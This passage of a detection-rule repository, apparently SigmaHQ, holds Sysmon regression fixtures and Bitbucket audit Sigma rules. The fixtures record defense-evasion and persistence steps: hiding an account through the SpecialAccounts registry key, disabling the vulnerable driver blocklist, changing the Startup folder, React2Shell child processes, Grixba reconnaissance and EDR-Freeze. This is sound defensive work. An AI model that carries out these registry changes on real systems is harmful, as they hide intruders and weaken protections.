    "path": "regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-31T05:06:45.377630Z\"\n        }\n      },\n      \"EventRecordID\": 657154,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3080,\n          \"ThreadID\": 4948\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-31 05:06:45.377\",\n      \"ProcessGuid\": \"14207D89-43E5-6904-4506-000000004002\",\n      \"ProcessId\": 5244,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist\\\\AtomicOperator$\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/info.yml",
    "content": "id: 3c14b160-a7f5-49a4-beb2-575b70f599b9\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd\n      title: Hiding User Account Via SpecialAccounts Registry Key\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-05T06:29:01.086253Z\"\n        }\n      },\n      \"EventRecordID\": 74886,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3636,\n          \"ThreadID\": 4340\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2026-01-05 06:29:01.070\",\n      \"ProcessGuid\": \"0197231E-7211-694F-D001-000000000C00\",\n      \"ProcessId\": 9524,\n      \"Image\": \"C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n      \"Details\": \"C:\\\\Test\\\\calc.exe\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/info.yml",
    "content": "id: 0a756043-828b-47af-9863-3eeb6939c54d\ndescription: N/A\ndate: 2026-01-05\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 9c226817-8dc9-46c2-a58d-66655aafd7dc\n      title: Modify User Shell Folders Startup Value\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-23T02:22:32.926365Z\"\n        }\n      },\n      \"EventRecordID\": 90931,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3320,\n          \"ThreadID\": 4216\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-12-23 02:22:32.922\",\n      \"ProcessGuid\": \"0197231E-FCE8-6949-4010-000000000D00\",\n      \"ProcessId\": 17728,\n      \"Image\": \"C:\\\\WINDOWS\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\CI\\\\Config\\\\VulnerableDriverBlocklistEnable\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/info.yml",
    "content": "id: 329ecd6e-38a9-4bab-a75f-66854af61019\ndescription: N/A\ndate: 2025-12-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: d526c60a-e236-4011-b165-831ffa52ab70\n      title: Windows Vulnerable Driver Blocklist Disabled\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 16,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 16,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:33:08.092105Z\"\n        }\n      },\n      \"EventRecordID\": 11738,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 8932,\n          \"ThreadID\": 1540\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-21-3960063115-309473240-3247002503-500\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"UtcTime\": \"2025-10-24 23:33:08.088\",\n      \"Configuration\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\sysmonconfig-trace.xml\",\n      \"ConfigurationFileHash\": \"SHA256=B977839264146AFDE215D41182F78F153F9198EBA8EF0B88426239C33FBDA945\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/sysmon/sysmon_config_modification/info.yml",
    "content": "id: 54f3ccdd-e1f9-4b9f-8dda-b1bdcb13d6ba\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 8ac03a65-6c84-4116-acad-dc1558ff7a77\n      title: Sysmon Configuration Change\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-06T21:11:02.649150Z\"\n        }\n      },\n      \"EventRecordID\": 67583,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3904,\n          \"ThreadID\": 4272\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-06 21:11:02.632\",\n      \"ProcessGuid\": \"0197231E-9BE6-6934-5301-000000000B00\",\n      \"ProcessId\": 3412,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"FileVersion\": \"10.0.26100.2454 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Command Processor\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"Cmd.Exe\",\n      \"CommandLine\": \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /d /s /c \\\"whoami\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\CVE-2025-55182-main\\\\CVE-2025-55182-main\\\\test-server\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-99CA-6934-A8EB-010000000000\",\n      \"LogonId\": \"0x1eba8\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF\",\n      \"ParentProcessGuid\": \"0197231E-9B6B-6934-2B01-000000000B00\",\n      \"ParentProcessId\": 1092,\n      \"ParentImage\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\bun-node-274e01c73\\\\node.exe\",\n      \"ParentCommandLine\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\bun-node-274e01c73\\\\node.exe C:\\\\Users\\\\xodih\\\\Downloads\\\\CVE-2025-55182-main\\\\CVE-2025-55182-main\\\\test-server\\\\node_modules\\\\next\\\\dist\\\\server\\\\lib\\\\start-server.js\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/info.yml",
    "content": "id: b6598f67-233f-4e7e-839d-2379a44fc63e\ndescription: N/A\ndate: 2025-12-06\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 271de298-cc0e-4842-acd8-079a0a99ea65\n      title: Suspicious Child Process from Node.js Server - React2Shell\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.evtx\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-26T05:11:27.927693Z\"\n        }\n      },\n      \"EventRecordID\": 142649,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-26 05:11:27.908\",\n      \"ProcessGuid\": \"0197231E-8BFF-6926-1308-000000000D00\",\n      \"ProcessId\": 10116,\n      \"Image\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\GRB_NET.exe\",\n      \"FileVersion\": \"1.1.3.0\",\n      \"Description\": \"GRB_NT\",\n      \"Product\": \"GRB_NT\",\n      \"Company\": \"Zabbix\",\n      \"OriginalFileName\": \"GRB_NET.exe\",\n      \"CommandLine\": \"GRB_NET.exe  -m:scan -i:f -d:list.txt\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-645E-3B0000000000\",\n      \"LogonId\": \"0x3b5e64\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=88DF27B6E794E3FD5F93F28B1CA1D3D0,SHA256=F8810179AB033A9B79CD7006C1A74FBCDE6ED0451C92FBB8C7CE15B52499353A,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\",\n      \"ParentProcessGuid\": \"0197231E-A1BD-6925-C705-000000000D00\",\n      \"ParentProcessId\": 7972,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/info.yml",
    "content": "id: 78005a80-bbfd-475c-a4b2-f562a7b0fecf\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: af688c76-4ce4-4309-bfdd-e896f01acf27\n      title: Grixba Malware Reconnaissance Activity\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.evtx\n"
  },
  {
    "path": "regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 7,\n      \"Version\": 3,\n      \"Level\": 4,\n      \"Task\": 7,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T07:40:10.165324Z\"\n        }\n      },\n      \"EventRecordID\": 571146,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4272\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 07:40:10.132\",\n      \"ProcessGuid\": \"0197231E-005A-6928-A50B-000000000D00\",\n      \"ProcessId\": 4460,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n      \"ImageLoaded\": \"C:\\\\Windows\\\\System32\\\\dbgcore.dll\",\n      \"FileVersion\": \"10.0.26100.7019 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Core Debugging Helpers\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"DBGCORE.DLL\",\n      \"Hashes\": \"SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C\",\n      \"Signed\": \"true\",\n      \"Signature\": \"Microsoft Windows\",\n      \"SignatureStatus\": \"Valid\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml",
    "content": "id: 63b16abe-2d5c-4a2f-b0ae-f1bc4580e40c\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b\n      title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.evtx\n"
  },
  {
    "path": "rules/README.md",
    "content": "TBD"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml",
    "content": "title: Bitbucket Full Data Export Triggered\nid: 195e1b9d-bfc2-4ffa-ab4e-35aef69815f8\nstatus: test\ndescription: Detects when full data export is attempted.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.collection\n    - attack.t1213.003\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Data pipeline'\n        auditType.action: 'Full data export triggered'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: high\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml",
    "content": "title: Bitbucket Global Permission Changed\nid: aac6c4f4-87c7-4961-96ac-c3fd3a42c310\nstatus: test\ndescription: Detects global permissions change activity.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Permissions'\n        auditType.action:\n            - 'Global permission remove request'\n            - 'Global permission removed'\n            - 'Global permission granted'\n            - 'Global permission requested'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml",
    "content": "title: Bitbucket Global Secret Scanning Rule Deleted\nid: e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05\nstatus: test\ndescription: Detects Bitbucket global secret scanning rule deletion activity.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Global administration'\n        auditType.action: 'Global secret scanning rule deleted'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml",
    "content": "title: Bitbucket Global SSH Settings Changed\nid: 16ab6143-510a-44e2-a615-bdb80b8317fc\nstatus: test\ndescription: Detects Bitbucket global SSH access configuration changes.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1021.004\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Global administration'\n        auditType.action: 'SSH settings changed'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml",
    "content": "title: Bitbucket Audit Log Configuration Updated\nid: 6aa12161-235a-4dfb-9c74-fe08df8d8da1\nstatus: test\ndescription: Detects changes to the bitbucket audit log configuration.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Auditing'\n        auditType.action: 'Audit log configuration updated'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: medium\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml",
    "content": "title: Bitbucket Project Secret Scanning Allowlist Added\nid: 42ccce6d-7bd3-4930-95cd-e4d83fa94a30\nstatus: test\ndescription: Detects when a secret scanning allowlist rule is added for projects.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Projects'\n        auditType.action: 'Project secret scanning allowlist rule added'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: low\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml",
    "content": "title: Bitbucket Secret Scanning Exempt Repository Added\nid: b91e8d5e-0033-44fe-973f-b730316f23a1\nstatus: test\ndescription: Detects when a repository is exempted from secret scanning feature.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Repositories'\n        auditType.action: 'Secret scanning exempt repository added'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: high\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml",
    "content": "title: Bitbucket Secret Scanning Rule Deleted\nid: ff91e3f0-ad15-459f-9a85-1556390c138d\nstatus: test\ndescription: Detects when secret scanning rule is deleted for the project or repository.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Basic\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category:\n            - 'Projects'\n            - 'Repositories'\n        auditType.action:\n            - 'Project secret scanning rule deleted'\n            - 'Repository secret scanning rule deleted'\n    condition: selection\nfalsepositives:\n    - Legitimate user activity.\nlevel: low\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml",
    "content": "title: Bitbucket Unauthorized Access To A Resource\nid: 7215374a-de4f-4b33-8ba5-70804c9251d3\nstatus: test\ndescription: Detects unauthorized access attempts to a resource.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.resource-development\n    - attack.t1586\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Security'\n        auditType.action: 'Unauthorized access to a resource'\n    condition: selection\nfalsepositives:\n    - Access attempts to non-existent repositories or due to outdated plugins. Usually \"Anonymous\" user is reported in the \"author.name\" field in most cases.\nlevel: critical\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml",
    "content": "title: Bitbucket Unauthorized Full Data Export Triggered\nid: 34d81081-03c9-4a7f-91c9-5e46af625cde\nstatus: test\ndescription: Detects when full data export is attempted an unauthorized user.\nreferences:\n    - https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html\n    - https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-02-25\ntags:\n    - attack.collection\n    - attack.resource-development\n    - attack.t1213.003\n    - attack.t1586\nlogsource:\n    product: bitbucket\n    service: audit\n    definition: 'Requirements: \"Advance\" log level is required to receive these audit events.'\ndetection:\n    selection:\n        auditType.category: 'Data pipeline'\n        auditType.action: 'Unauthorized full data export triggered'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/application/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml",
